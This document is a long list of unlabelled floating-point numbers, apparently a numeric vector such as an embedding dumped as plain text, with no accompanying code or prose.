-0.009504182264208794, -0.026187898591160774, 0.016383249312639236, 0.015402785502374172, -0.030584175139665604, -0.013884645886719227, 0.044879984110593796, 0.005645579192787409, -0.011820926330983639, -0.014303715899586678, 0.04532277584075928, -0.034253012388944626, 0.019008364528417587, -0.03896556794643402, -0.011109298095107079, -0.002144766738638282, 0.03953487053513527, -0.03396835923194885, -0.01283301878720522, -0.013592088595032692, -0.03928184509277344, -0.006365113891661167, -0.03153301030397415, 0.027611153200268745, 0.008697671815752983, -0.00904557853937149, -0.00793860200792551, 0.03798510134220123, -0.018549760803580284, 0.018976736813783646, -0.01744278520345688, -0.05927067622542381, -0.007646043784916401, 0.01593255251646042, -0.030963709577918053, -0.03031533770263195, -0.009203718043863773, 0.04339347407221794, 0.004846975207328796, -0.012896274216473103, 0.015497668646275997, 0.03091626800596714, 0.037668824195861816, 0.013315344229340553, 0.009496275335550308, -0.01948278397321701, -0.003568022046238184, 0.045259520411491394, 0.04513300582766533, -0.0010387786896899343, 0.001110929879359901, 0.0023365106899291277, 0.03912370651960373, -0.015315808355808258, 0.03532835841178894, -0.011710228398442268, -0.0717320665717125, -0.045480914413928986, 0.02914510667324066, 0.03211812674999237, -0.019830690696835518, -0.016920924186706543, 0.0176483653485775, 0.021443713456392288, 0.02169673703610897, 0.017332086339592934, -0.003556161653250456, -0.028449293226003647, -0.016383249312639236, -0.0032695336267352104, -0.0022772084921598434, 0.01804371364414692, -0.03646696358919144, -0.006709067616611719, -0.004593952093273401, -0.021728364750742912, 0.012168833054602146, 0.002109185326844454, 0.012334879487752914, 0.036625102162361145, -0.027579525485634804, 0.011536275036633015, 0.0521860271692276, -0.03931347280740738, -0.013615809381008148, -0.010816740803420544, 0.014019064605236053, 0.00035556673537939787, -0.03577115014195442, -0.014113948680460453, -0.017173947766423225, -0.02492278255522251, -0.04835905134677887, -0.04873858764767647, -0.028607431799173355, 0.040230683982372284, -0.009156275540590286, -0.02446417696774006, 0.034600917249917984, -0.008492089807987213, 0.004479300696402788, -0.03969300910830498, 0.019783249124884605, -0.009456740692257881, -0.018407436087727547, 0.007021392695605755, -0.03472742810845375, -0.020763713866472244, -0.012026507407426834, 0.005088137928396463, -0.0003884300822392106, -0.04342510178685188, -0.012872553430497646, 0.012326972559094429, 0.033399056643247604, -0.024242782965302467, 0.002927557099610567, 0.001492441282607615, -0.03207068517804146, 0.017379527911543846, 0.031627897173166275, -0.02509673498570919, 0.0072546484880149364, 0.01948278397321701, 0.011607437394559383, 0.002967091975733638, -0.016984179615974426, 0.04231812432408333, 0.03589766100049019, -0.006408602464944124, -0.025191618129611015, -0.01574278436601162, 0.03855440393090248, 0.0246855728328228, 0.004190696403384209, 0.0018482551677152514, -0.02005208656191826, -0.001504301792010665, -0.05645579472184181, 0.0010872089769691229, 0.04832742363214493, 0.03931347280740738, -0.0065746488980948925, -0.025239061564207077, -0.0023997665848582983, 0.004843021742999554, -0.04399440437555313, -0.02267720177769661, -0.00415906822308898, -0.008808368816971779, -0.015268366783857346, 0.004763951990753412, 0.02085859701037407, -0.003809184767305851, -0.0015981971519067883, -0.028038129210472107, -0.031422313302755356, -0.001363952993415296, 0.03475905582308769, -0.014786041341722012, -0.02606138586997986, -0.014651622623205185, -0.0064758118242025375, -0.014983715489506721, 0.011022321879863739, 0.037637196481227875, -0.006661625578999519, -0.04032556712627411, -0.017363714054226875, -0.028465107083320618, 0.023135805502533913, 0.01687348261475563, 0.019514411687850952, 0.024385107681155205, 0.008523717522621155, 0.01723720319569111, 0.009488368406891823, 0.004034533631056547, 0.005938137415796518, -0.01574278436601162, 0.021396271884441376, -0.06572277098894119, -0.022914409637451172, 0.018613016232848167, 0.006507439538836479, -0.005206742323935032, -0.001002703094854951, 0.02107999287545681, 0.021997202187776566, 0.014746506698429585, 0.0005974707310087979, -0.046429749578237534, -0.00024758712970651686, -0.010516275651752949, 0.018802784383296967, -0.011567902751266956, -0.0016466273227706552, 0.005115812178701162, 0.026773013174533844, 0.004676975309848785, -0.0198939461261034, -0.014406506903469563, 0.002140813274309039, 0.02228185348212719, 0.01496790163218975, 0.005226509645581245, -0.03450603410601616, 0.04775812104344368, 0.026187898591160774, -0.027769291773438454, -0.01324418094009161, 0.0039001149125397205, 0.010761391371488571, 0.005645579192787409, -0.007796276360750198, -0.025792548432946205, 0.0018650575075298548, -0.003144998801872134, 0.05958695709705353, 0.01647813431918621, 0.013592088595032692, -0.03156464174389839, -0.016715342178940773, 0.03233952447772026, 0.0356762669980526, 0.016177669167518616, 0.04215998575091362, -0.005791858304291964, -0.003583835903555155, -0.008420927450060844, -0.012999065220355988, 0.039250217378139496, 0.004914184100925922, 0.021775806322693825, 0.032181382179260254, -0.0027812779881060123, -0.016731156036257744, 0.02104836516082287, -0.026235340163111687, 0.015007436275482178, 0.01374232117086649, 0.0004249998601153493, -0.002340464387089014, 0.03475905582308769, -0.030773943290114403, -0.007590694818645716, 0.000846046197693795, 0.02851254865527153, 0.02391069009900093, 0.02367348037660122, -0.04215998575091362, 0.00403848709538579, -0.0036787197459489107, 0.007622322998940945, -0.01867627166211605, -0.010002322494983673, 0.0019648829475045204, -0.010998601093888283, -0.019941387698054314, -0.021127434447407722, 0.023531153798103333, -0.02367348037660122, -0.006637904793024063, 0.0010259298142045736, -0.012927902862429619, -0.00831813644617796, -0.0401674285531044, 0.043899521231651306, -0.02954045496881008, -0.005277905147522688, 0.016130227595567703, 0.016090691089630127, 0.016090691089630127, 0.019609294831752777, 0.02971440739929676, -0.0008910171454772353, -0.015228832140564919, 0.013679064810276031, -0.044468820095062256, 0.0036886034067720175, -0.028781386092305183, -0.011496740393340588, -0.005799765232950449, 0.03251347690820694, -0.010302786715328693, 0.0030659290496259928, -0.008689763955771923, -0.009093020111322403, 0.019546039402484894, -0.032829754054546356, -0.04257114604115486, -0.00955162476748228, -0.009654414840042591, -0.021127434447407722, 0.02408464252948761, 0.0004279649583622813, -0.006060695741325617, 0.011781390756368637, 0.01183674018830061, -0.012532553635537624, 0.0004924561944790184, 0.009662321768701077, 0.022534875199198723, -0.04652463644742966, -0.016122320666909218, 0.0037933706771582365, -0.015307901427149773, -0.0012572088744491339, 0.0014321506023406982, -0.006819765083491802, -0.03349394351243973, 0.003148952266201377, 0.043077193200588226, -0.004261858761310577, 0.00864232238382101, -0.011386042460799217, 0.00667743943631649, 0.035802777856588364, -0.007879299111664295, -0.008768834173679352, 0.027041850611567497, -0.024495804682374, 0.0016219180542975664, 0.015940459445118904, 0.0012374414363875985, 0.03871254622936249, -0.005874881520867348, -0.035644639283418655, -0.006139765493571758, 0.0026172082871198654, -0.029208362102508545, 0.003631277708336711, -0.0161855760961771, 0.012326972559094429, -0.031627897173166275, 0.002874185098335147, -0.03668835759162903, 0.01668371446430683, 0.005032788962125778, -0.01888185366988182, -0.01767999306321144, 0.029999058693647385, -0.012643251568078995, 0.014343250542879105, -0.017395343631505966, 0.023546967655420303, 0.006463951431214809, 0.01663627289235592, -0.00022040690237190574, 0.0009527903748676181, -0.00018223104416392744, -0.033399056643247604, -0.0034434872213751078, 0.009583252482116222, -0.0024136037100106478, -0.024543246254324913, 0.009211624972522259, 0.01594836637377739, -0.03067905828356743, -0.020779527723789215, 0.007290230132639408, -0.0001457848265999928, -0.014343250542879105, 0.0024472083896398544, 0.006412555929273367, -0.006151625886559486, 0.006827672012150288, 0.03298789635300636, -0.00904557853937149, 0.014912553131580353, -0.03716277703642845, 0.013876738958060741, 0.005874881520867348, 0.014691157266497612, -0.0015853482764214277, -0.004839068278670311, -0.025381386280059814, -0.0058234864845871925, -0.02571347914636135, -0.008112555369734764, -0.0123427864164114, 0.0222502239048481, -0.022645574063062668, 0.024021387100219727, 0.026820454746484756, -0.02531813085079193, -0.02670975774526596, -0.02607719972729683, -0.013402320444583893, -0.0015240692300722003, -0.009464647620916367, 0.01475441362708807, 0.021538596600294113, 0.03466417267918587, -0.0026112780906260014, -0.03953487053513527, 0.022424178197979927, 0.008753020316362381, -0.021680923178792, -0.006689299829304218, -0.017395343631505966, 0.010492554865777493, 0.015228832140564919, 0.035043708980083466, -0.0038843010552227497, 0.008879532106220722, 0.016509762033820152, -0.04699905216693878, -0.006286044139415026, 0.010579531081020832, -0.020573945716023445, 0.0146437156945467, 0.012137205339968204, 0.003621394047513604, 0.02145952731370926, -0.021744178608059883, 0.002761510666459799, 0.0026765107177197933, -0.03700463846325874, -0.008666043169796467, -0.012500925920903683, -0.011504647321999073, -0.028401849791407585, -0.022914409637451172, -0.01065860129892826, -0.001528022694401443, -0.006250462960451841, 0.013947902247309685, -0.015355342999100685, 0.010619065724313259, -0.011386042460799217, -0.031422313302755356, -0.010389763861894608, 0.0019589527510106564, -0.008847903460264206, -0.026994409039616585, -0.016114413738250732, -0.008579066954553127, 0.019182318821549416, -0.02107999287545681, -0.0010793019318953156, 0.019546039402484894, 0.010587438009679317, -0.030457664281129837, -0.01123580988496542, -0.021601852029561996, -0.005206742323935032, 0.003937672823667526, -0.03690975531935692, 0.02231348119676113, 0.029429757967591286, 0.03709952160716057, 0.0024709294084459543, -0.0214911550283432, 0.0026666270568966866, -0.0025124410167336464, 0.016367435455322266, -0.009108833968639374, 0.04178044945001602, -0.010642786510288715, 0.019308829680085182, 0.028370222076773643, 0.011259530670940876, 0.017600923776626587, 0.018723715096712112, -0.01804371364414692, 0.03211812674999237, -0.0014795925235375762, 0.02248743362724781, 0.01485720369964838, -0.01426418125629425, 0.011212089098989964, -0.02670975774526596, 0.0018472668016329408, 0.0035067428834736347, -0.006491625681519508, -0.007788369432091713, -0.02169673703610897, -0.016106506809592247, -0.014801855199038982, -0.00011576303950278088, 0.000664185790810734, 0.017569296061992645, 0.023831618949770927, 0.007942555472254753, 0.006598369684070349, -0.007831857539713383, 0.008191624656319618, 0.005451858509331942, -0.013908367604017258, 0.0033999988809227943, -0.031422313302755356, 0.02330975979566574, -0.014082320965826511, 0.02968277968466282, -0.021649295464158058, 0.004076045006513596, 0.008847903460264206, -0.027753477916121483, 0.00586302112787962, 0.05746788531541824, 0.026614874601364136, -0.00922743882983923, 0.006167439743876457, 0.0024709294084459543, -0.026029758155345917, -0.0051276725716888905, 0.00586302112787962, -0.029999058693647385, 0.012516739778220654, -0.012785577215254307, -0.008191624656319618, 0.01867627166211605, -0.0040048821829259396, 0.0028405804187059402, 0.0054795327596366405, -0.015363250859081745, -0.01433534361422062, 0.04238137975335121, 0.021680923178792, -0.02266138792037964, -0.010286972858011723, 0.05958695709705353, 0.0007857555174268782, -0.0013155228225514293, 0.013947902247309685, 0.020969294011592865, 0.003830928821116686, 0.02389487437903881, 0.0285283625125885, 0.016968365758657455, -0.014604181051254272, 0.003732091747224331, 0.01567162200808525, -0.015916738659143448, 0.020226038992404938, -0.024195339530706406, -0.007041160482913256, -0.019625108689069748, 0.012485112063586712, -0.024827897548675537, -0.02085859701037407, 0.0031588361598551273, -0.021981388330459595, -0.0010565693955868483, 0.0022001154720783234, 0.007776509039103985, -0.02631440944969654, 0.0026527896989136934, -0.027199991047382355, 0.029840920120477676, 0.025855805724859238, 0.01063487958163023, 0.05212277173995972, -0.032418593764305115, -0.004902323707938194, -0.00011434225598350167, -0.027974873781204224, -0.011156740598380566, -0.0510474257171154, 0.0008435752824880183, 0.01984650455415249, -0.023088363930583, -0.04839067906141281, 0.004396277479827404, 0.0013738367706537247, 0.002111162059009075, -0.028607431799173355, 0.004708603024482727, 0.0021368598099797964, -0.0394083596765995, -0.005289765540510416, -0.004522789269685745, 0.01444604154676199, -0.004839068278670311, -0.02647254802286625, -0.003281394252553582, 0.026852084323763847, 0.02772185020148754, 0.01436697132885456, 0.001190987997688353, 0.02971440739929676, -0.03033115155994892, -0.013022786006331444, 0.03355719894170761, -0.006428369786590338, 0.012769763357937336, -0.026187898591160774, -0.02027348056435585, -0.014034878462553024, 0.01165487989783287, 0.026440920308232307, -0.03033115155994892, -0.01484138984233141, 0.013821390457451344, 0.005712788552045822, -0.020621387287974358, -0.03608742728829384, 0.01964092254638672, 0.009559531696140766, -0.020795341581106186, -0.022392550483345985, -0.028196269646286964, -0.015813948586583138, 0.01647813431918621, -0.011196275241672993, 0.029050221666693687, 0.024337666109204292, 0.011813019402325153, 0.030868826434016228, 0.03396835923194885, -0.009369764477014542, 0.0024788363371044397, -0.012674879282712936, -0.0012937786523252726, 0.03308277949690819, -0.004380463622510433, -0.018375808373093605, -0.0016802320023998618, 0.05847997963428497, 0.00027328479336574674, 0.018170226365327835, -0.026551619172096252, -0.020826969295740128, -0.002710115397349, -0.024622317403554916, 0.003625347511842847, -0.011101391166448593, -0.0007432555430568755, 0.05980835109949112, -0.02753208391368389, 0.017806505784392357, 0.038048360496759415, -0.005163254216313362, -0.011275344528257847, -0.026962781324982643, -0.0285283625125885, -0.003067905781790614, 0.011733949184417725, -0.05376742407679558, -0.00842883437871933, -0.014406506903469563, 0.027247432619333267, -0.004728370346128941, 0.007108369376510382, 0.05360928177833557, -0.002696278039366007, 0.0032596499659121037, 0.0011544182198122144, -0.023373015224933624, -0.026393478736281395, -0.03991440311074257, -0.008903252892196178, 0.008436741307377815, -0.026804640889167786, 0.019530225545167923, -0.02389487437903881, -0.003919882234185934, -0.032829754054546356, 0.022993480786681175, 0.026946967467665672, 0.018771156668663025, -0.008879532106220722, -0.018012085929512978, 0.002702208235859871, -0.0018828482134267688, -0.02006790041923523, 0.029239989817142487, -0.043646495789289474, -0.02432185225188732, -0.02688371203839779, -0.01103813573718071, -0.011322787031531334, 0.039851147681474686, -0.028559990227222443, 0.0073692998848855495, 0.0262827817350626, 0.0030659290496259928, 0.0010644763242453337, 0.0025084875524044037, 0.013876738958060741, -0.024986037984490395, 0.019593480974435806, 0.03067905828356743, 0.006867206655442715, -0.0005747381947003305, 0.008982322178781033, 0.01103813573718071, -0.022961853072047234, 0.03450603410601616, -0.011085577309131622, -0.0029137199744582176, 0.016414877027273178, -0.01603534258902073, 0.02131720259785652, 0.002439301460981369, -0.0401674285531044, -0.010065577924251556, -0.0255237128585577, -0.033841848373413086, -0.04880184307694435, 0.028575804084539413, -0.002451161853969097, 0.015054878778755665, -0.020605573430657387, 0.022329295054078102, 0.014359064400196075, 0.006060695741325617, -0.013505111448466778, 0.002484766533598304, -0.05237579718232155, 0.01885022595524788, 0.014216738753020763, -0.013528832234442234, 0.014793948270380497, -0.001542848302051425, 0.012840925715863705, 0.003763719694688916, 0.017506040632724762, 0.027437198907136917, 0.003919882234185934, -0.021586038172245026, -0.021981388330459595, -0.030204640701413155, -0.006143718957901001, 0.01574278436601162, -0.012825111858546734, 0.0008109590271487832, 0.01444604154676199, -0.005815579555928707, 0.01809115707874298, -0.009013949893414974, -0.004285580012947321, 0.01608278416097164, 0.004202556796371937, -0.011188368313014507, 0.02209208533167839, -0.05253393575549126, -0.017727436497807503, 0.01929301582276821, 0.055095795542001724, 0.02005208656191826, -0.008420927450060844, -0.014501390047371387, -0.011006508022546768, -0.009393485262989998, 0.007365346420556307, -0.01649394817650318, -0.02432185225188732, -0.0031311616767197847, 0.02789580449461937, -0.0007694474188610911, 0.04633486643433571, -0.02150696888566017, 0.004451626446098089, -0.003144998801872134, -0.0026349991094321012, -0.011623251251876354, 0.0005381684168241918, 0.0153474360704422, -0.01284883264452219, -0.031406499445438385, 0.003983138129115105, -0.012896274216473103, -0.01092743780463934, -0.03611905872821808, -0.027373943477869034, 0.008005810901522636, -0.002757557202130556, 0.03700463846325874, 0.0056811608374118805, -0.0033999988809227943, 0.01649394817650318, -0.0010684299049898982, -0.017395343631505966, -0.021000923588871956, 0.01946697011590004, -0.0003281394310761243, 0.027421385049819946, 0.0034296498633921146, -0.007005578838288784, 0.003929765895009041, 0.019609294831752777, 0.022044643759727478, -0.006147672422230244, -0.012975344434380531, -0.011899995617568493, 0.007887206971645355, -0.006894881371408701, -0.016043249517679214, -0.020921852439641953, 0.010887903161346912, -0.033810220658779144, 0.004046394024044275, 0.014683250337839127, -0.003755812533199787, 0.014477669261395931, 0.10165205597877502, -0.02070045843720436, -0.02346789836883545, 0.019593480974435806, -0.023357201367616653, -0.005831393413245678, -0.009883717633783817, 0.004918138030916452, -0.004933951888233423, -0.022202782332897186, 0.019387900829315186, -0.010911623947322369, 0.01615394838154316, 0.011797205545008183, 0.021143248304724693, 0.023546967655420303, -0.01926138810813427, -0.01703162118792534, 0.005305579397827387, -0.004601859021931887, 0.013781855814158916, 0.01967255212366581, 0.009859996847808361, -0.011362321674823761, 0.00497348653152585, -0.013220460154116154, -0.04832742363214493, -0.009211624972522259, 0.009164182469248772, 0.01386092510074377, 0.031627897173166275, -0.003953487146645784, 0.004609765950590372, 0.012121391482651234, -0.007954415865242481, -0.004008835647255182, 0.029461385682225227, 0.01424836739897728, -0.019356273114681244, -0.0397878922522068, 0.0009483426692895591, -0.008270694874227047, -0.027184177190065384, 0.012722320854663849, 0.005902556236833334, -0.011283251456916332, 0.013568366877734661, 0.00984418299049139, -0.006740695331245661, -0.005613951478153467, 0.00026809584232978523, -0.005293719004839659, 0.0027595339342951775, -0.003249766305088997, 0.004155114758759737, -0.019530225545167923, -0.0299358032643795, -0.001525057596154511, -0.020131155848503113, -0.016225110739469528, 0.00012175504525657743, 0.0170790646225214, 0.001897673704661429, -0.018929295241832733, -0.013710692524909973, -0.015624180436134338, -0.025776734575629234, 0.01889766752719879, -0.021601852029561996, 0.019719993695616722, -0.0176483653485775, 0.010184182785451412, -0.010816740803420544, -0.001378778601065278, 0.026978595182299614, -0.025191618129611015, -0.017901388928294182, 0.013639530166983604, -0.009504182264208794, -0.032228827476501465, -0.006669532507658005, 0.01283301878720522, -0.009780926629900932, 0.01555301807820797, 0.008017671294510365, -0.00486674252897501, -0.03573952242732048, 0.0006577614112757146, -0.015995807945728302, -0.0269311536103487, 0.004961626138538122, 0.027769291773438454, 0.012840925715863705, -0.006357206963002682, -0.0031133710872381926, -0.008191624656319618, -0.0076658111065626144, -0.007041160482913256, -0.0269311536103487, -0.02250324748456478, 0.015054878778755665, 0.017901388928294182, 0.01436697132885456, -0.0208427831530571, -0.02471720054745674, 0.010832554660737514, 0.008745113387703896, -0.009203718043863773, -0.007993950508534908, 0.005700928159058094, 0.010713949799537659, 0.01649394817650318, 0.01984650455415249, -0.0050683701410889626, -0.019024180248379707, -0.005388602614402771, -0.004491161089390516, -0.013180925510823727, 0.0028465106151998043, 0.004965579602867365, 0.008357671089470387, 0.005349067971110344, 0.04690416902303696, -0.017015807330608368, -0.00502092856913805, 0.0301255714148283, -0.00391395203769207, -0.015987901017069817, -0.0013975576730445027, 0.006835578940808773, 0.005566509440541267, 0.037668824195861816, 0.005242323502898216, 0.005946044344455004, 0.02049487642943859, -0.016810227185487747, 0.006463951431214809, 0.03418975695967674, -0.020605573430657387, 0.025571154430508614, -0.003267556894570589, 0.0011830809526145458, -0.002121045719832182, 0.017790691927075386, 0.01325208880007267, 0.0028425571508705616, -0.018138598650693893, -0.0008737206226214767, 0.01495208777487278, 0.00883999653160572, 0.011662786826491356, -0.02490696869790554, 0.011291158385574818, 0.023119991645216942, 0.00935395061969757, -0.025950688868761063, -0.02286696806550026, 0.010563717223703861, -0.010302786715328693, -0.0012680809013545513, -0.008871625177562237, 0.02027348056435585, 0.0317227803170681, -0.020320923998951912, 0.015885110944509506, 0.015363250859081745, -0.025729293003678322, -0.006357206963002682, 0.0005386625998653471, 0.01964092254638672, 0.012042321264743805, -0.011386042460799217, -0.019198132678866386, 0.014983715489506721, 0.04197021946310997, 0.03393673151731491, 0.005803718697279692, -0.013821390457451344, 0.020795341581106186, -0.03184929117560387, -0.013916274532675743, -0.012129298411309719, 0.004427905194461346, 0.004981393460184336, 0.019909759983420372, -0.005696974694728851, 0.00608046306297183, 0.004720463417470455, -0.007491857744753361, 0.028417663648724556, 0.027579525485634804, 0.030963709577918053, -0.02746882662177086, -0.008436741307377815, -0.006155579350888729, -0.031153477728366852, -0.020558131858706474, -0.004926044959574938, 0.0003614969609770924, -0.04035719484090805, -0.01826510950922966, -0.0018719760701060295, 0.008658136241137981, -0.001810697023756802, 0.02305673621594906, -0.03548650071024895, -0.014667436480522156, 0.012524646706879139, 0.021680923178792, -0.00833395030349493, -0.023546967655420303, -0.004570230841636658, 0.00904557853937149, -0.0009824414737522602, 0.046651147305965424, -0.003192440839484334, -0.009780926629900932, -0.003929765895009041, -0.01575859822332859, -0.004463486839085817, -0.005669300444424152, 0.012382321059703827, -0.01506278570741415, 0.020368365570902824, -0.026583246886730194, 0.00228709215298295, 0.01616976223886013, 0.0061713932082057, -0.007559067104011774, -0.010785112157464027, 0.0005757265607826412, 0.01545813400298357, 0.011164647527039051, 0.014651622623205185, -0.003475115168839693, 0.01788557507097721, 0.015466040931642056, -0.00982046127319336, -0.009788833558559418, 0.0044476729817688465, 0.009923252277076244, 0.02387906052172184, 0.0002295493322890252, 0.005376742221415043, 0.01545813400298357, -0.00027106094057671726, 0.008832089602947235, 0.004835114348679781, -0.01537115778774023, -0.00025994176394306123, -0.009306508116424084, 0.007100462447851896, 0.006456044036895037, -0.018613016232848167, -0.013054413720965385, -0.016130227595567703, 0.0047876727767288685, -0.02024185284972191, -0.013093949295580387, -0.022835340350866318, 0.018613016232848167, -0.004166975151747465, 0.0154423201456666, 0.005424184259027243, -0.029366500675678253, 0.007159764878451824, -0.012390227988362312, -0.01333906501531601, -0.016936738044023514, -0.0005475579528138041, 0.01767999306321144, -0.01864464394748211, 0.0038289520889520645, -0.010785112157464027, -0.013924181461334229, -0.004163021687418222, -0.009765112772583961, -0.005578370299190283, 0.01572697050869465, 0.01867627166211605, 0.01910324953496456, 0.016399063169956207, -0.007207206916064024, -0.023167433217167854, -0.014517203904688358, -0.009298601187765598, -0.010619065724313259, 0.015228832140564919, 0.012809298001229763, -0.041843704879283905, 0.020194411277770996, -0.03554975613951683, -0.0023720921017229557, -0.018518133088946342, 0.013370692729949951, 0.01628836616873741, -0.03295626863837242, 0.017600923776626587, 0.031185105443000793, -0.020131155848503113, 0.010832554660737514, 0.00383685901761055, 0.007918834686279297, 0.003103487193584442, 0.006918602157384157, -0.006392788607627153, -0.02792743220925331, -0.012564181350171566, -0.00030170046375133097, 0.015798134729266167, -0.003374301129952073, -0.008357671089470387, -0.03235533833503723, -0.016043249517679214, 0.007389067206531763, 0.0020202319137752056, -0.018992550671100616, 0.025349758565425873, -0.014200924895703793, 0.013188832439482212, -0.013805576600134373, 0.007756741251796484, -0.05322974920272827, -0.0005880811950191855, -0.009259066544473171, 0.012374414131045341, -0.011425577104091644, 0.025397200137376785, -0.009741391986608505, 0.009519997052848339, 0.005032788962125778, 0.033051151782274246, 0.009322321973741055, -0.010468833148479462, -0.013457669876515865, 0.013386506587266922, 0.008942787535488605, 0.02351533994078636, 0.0010160461533814669, 0.010990694165229797, -0.03254510462284088, 0.007669764570891857, -0.0021902318112552166, 0.023610224947333336, 0.0011474995408207178, 0.0059223235584795475, 0.03830138221383095, -0.007345578633248806, -0.01910324953496456, -0.008207438513636589, -0.02727906033396721, 0.0285283625125885, -0.012524646706879139, 0.009077206254005432, 0.01275394856929779, 0.0255237128585577, 0.008673950098454952, 0.012730227783322334, 0.01125162374228239, -0.032039057463407516, -0.006807904690504074, -0.012825111858546734, 0.001090174075216055, -0.008713485673069954, 0.003660928923636675, 0.0012532554101198912, 0.002134883077815175, -0.0008712497074157, -0.005147439893335104, -0.011046042665839195, 0.0063611604273319244, -0.02307255007326603, -0.009266973473131657, -0.01625673845410347, 0.018201854079961777, 0.021159062162041664, 0.025444641709327698, -0.026187898591160774, -0.009725578129291534, 0.02470138669013977, -0.022993480786681175, -0.028781386092305183, -0.004499068018049002, -0.013014879077672958, 0.009085113182663918, 0.002192208543419838, -0.0061239511705935, -0.035233475267887115, 0.004850928671658039, 0.018771156668663025, 0.013109763152897358, 0.006883020978420973, 0.02166510932147503, 0.017142320051789284, 0.0006463951431214809, 0.018597202375531197, -0.006962090730667114, 0.007934648543596268, -0.02365766651928425, -0.004878602921962738, -0.026172082871198654, -0.020621387287974358, 0.0045188358053565025, 0.017996272072196007, 0.014778134413063526, 0.011591623537242413, 0.004479300696402788, -0.021570224314928055, 0.011243716813623905, -0.011299066245555878, 0.008262787945568562, -0.02267720177769661, 0.008452555164694786, 0.008302322588860989, 0.00018791417824104428, -0.009899531491100788, 0.012904181145131588, 0.018154412508010864, 0.015355342999100685, 0.009259066544473171, 0.0006305811693891883, 0.00037063940544612706, 0.006839532405138016, -0.02090603858232498, -0.02245580591261387, -0.027263246476650238, -0.02867068722844124, -0.0002656248980201781, -0.01905580796301365, -0.006349300034344196, -0.02931905910372734, 0.02106417901813984, -0.0038744171615689993, -0.016588831320405006, -0.004526742734014988, 0.004831160884350538, 0.0005302614299580455, -0.003919882234185934, 0.016351621598005295, 0.022772084921598434, -0.000900900864508003, 0.00032937488867901266, 0.006989764980971813, -0.014888832345604897, -0.00406813807785511, 0.025855805724859238, -0.0178381334990263, -0.02089022472500801, -0.00293151056393981, -0.005032788962125778, 0.015663715079426765, 0.00003142713103443384, 0.00851581059396267, -0.0024175571743398905, -0.0012463367311283946, -0.024796269834041595, 0.0008559299167245626, 0.0006088369991630316, -0.010603251866996288, 0.00902185682207346, 0.040230683982372284, -0.0039712777361273766, 0.007867438718676567, -0.01597999408841133, -0.012176739983260632, 0.005167207680642605, 0.0009987496305257082, -0.02070045843720436, -0.034632544964551926, -0.012374414131045341, -0.006440230179578066, -0.001778080826625228, 0.0033881382551044226, -0.013853018172085285, 0.008239067159593105, 0.020004644989967346, -0.004613719414919615, -0.01847069151699543, 0.0024116269778460264, 0.011773483827710152, -0.007139997556805611, 0.035043708980083466, -0.01684185490012169, -0.03349394351243973, -0.018154412508010864, -0.004922091495245695, 0.0026527896989136934, -0.006254416424781084, 0.004253951832652092, -0.005594184156507254, -0.02109580673277378, -0.02528650313615799, -0.023420456796884537, 0.02085859701037407, 0.013766041956841946, 0.010959065519273281, 0.004099765792489052, 0.006266276817768812, 0.0006098253652453423, 0.006127904634922743, -0.00809278804808855, 0.00577209098264575, 0.021380458027124405, -0.003374301129952073, -0.004696742631494999, -0.004186742939054966, -0.00621488131582737, 0.007934648543596268, 0.02089022472500801, 0.004839068278670311, -0.003455347614362836, 0.005483486223965883, 0.0014558716211467981, -0.028370222076773643, -0.00044995624921284616, 0.009077206254005432, 0.0034573243465274572, -0.00883999653160572, 0.01134650781750679, -0.019403714686632156, -0.004965579602867365, -0.004965579602867365, 0.001063487958163023, -0.022961853072047234, 0.0031311616767197847, -0.00891906674951315, -0.015363250859081745, 0.0016347668133676052, -0.007974183186888695, -0.013323251157999039, -0.00883999653160572, 0.012706506997346878, -0.0004640405240934342, -0.016335807740688324, -0.00526604475453496, -0.0016960458597168326, 0.013813483528792858, 0.004993253853172064, -0.013528832234442234, -0.014129762537777424, -0.003554184688255191, -0.00441999826580286, -0.01475441362708807, -0.0010941275395452976, 0.002263371367007494, -0.0004969039000570774, -0.013307437300682068, -0.015545111149549484, 0.00022806678316555917, 0.030441850423812866, 0.009693950414657593, -0.014801855199038982, -0.012073948979377747, 0.0010743601014837623, 0.015426506288349628, -0.009693950414657593, -0.010310693643987179, -0.010935344733297825, 0.0012967437505722046, -0.005353021435439587, 0.01802789978682995, 0.036213941872119904, 0.02873394265770912, 0.019577667117118835, -0.01907162182033062, 0.016604645177721977, 0.0005613951361738145, -0.005475579295307398, -0.0015379064716398716, -0.01295953057706356, 0.0030125570483505726, 0.02688371203839779, -0.015181389637291431, -0.0023602317087352276, -0.018755342811346054, 0.005515114404261112, 0.008547439239919186, 0.004368603229522705, 0.0027911618817597628, 0.025333944708108902, -0.009282787330448627, 0.02006790041923523, -0.028354408219456673, -0.02128557302057743, -0.0045860446989536285, 0.012864646501839161, -0.00657069543376565, 0.004752091132104397, -0.010492554865777493, 0.014722785912454128, 0.0072665088810026646, -0.005483486223965883, -0.0009443892049603164, 0.013781855814158916, -0.012516739778220654, 0.02310417778789997, -0.005855114199221134, -0.010919530875980854, 0.0003526016080286354, 0.011030228808522224, 0.010919530875980854, 0.03709952160716057, 0.008942787535488605, -0.01185255404561758, -0.027389757335186005, -0.015560925006866455, -0.015513482503592968, 0.003732091747224331, -0.016968365758657455, 0.0099469730630517, 0.0065430207177996635, -0.00024820485850796103, 0.004261858761310577, -0.004941858816891909, 0.0014627901837229729, 0.016620459035038948, -0.0005930230254307389, 0.018549760803580284, -0.006424416322261095, -0.02147534117102623, 0.01214511226862669, -0.02126975916326046, 0.018597202375531197, -0.021127434447407722, -0.03368370980024338, 0.0008658136357553303, 0.012295344844460487, -0.013789762742817402, -0.006345346570014954, 0.016177669167518616, -0.00813627615571022, -0.008080927655100822, 0.008476275950670242, -0.0023543015122413635, -0.009061392396688461, 0.03681487217545509, -0.009385578334331512, 0.009259066544473171, -0.015837669372558594, -0.004396277479827404, -0.005550695583224297, 0.0023305804934352636, 0.0009577322052791715, -0.011291158385574818, -0.018597202375531197, 0.01043720543384552, 0.01907162182033062, -0.001152441487647593, 0.0018907551420852542, 0.024638131260871887, -0.014540924690663815, -0.0010338368592783809, 0.013291623443365097, -0.016968365758657455, 0.0018186039524152875, -0.003886277787387371, 0.003067905781790614, -0.0015171506674960256, 0.0036332544405013323, -0.001513197086751461, 0.0027891851495951414, 0.03336742892861366, -0.01033441536128521, 0.0031588361598551273, -0.010184182785451412, -0.011599530465900898, -0.0010595344938337803, -0.007337671704590321, -0.0016110459109768271, 0.016762785613536835, -0.008144183084368706, 0.006590462755411863, -0.013892552815377712, -0.00601720716804266, -0.018818598240613937, -0.001951045822352171, -0.0049972073175013065, 0.001492441282607615, 0.00586302112787962, -0.014145576395094395, 0.0005144475144334137, -0.009061392396688461, 0.011773483827710152, -0.00883999653160572, 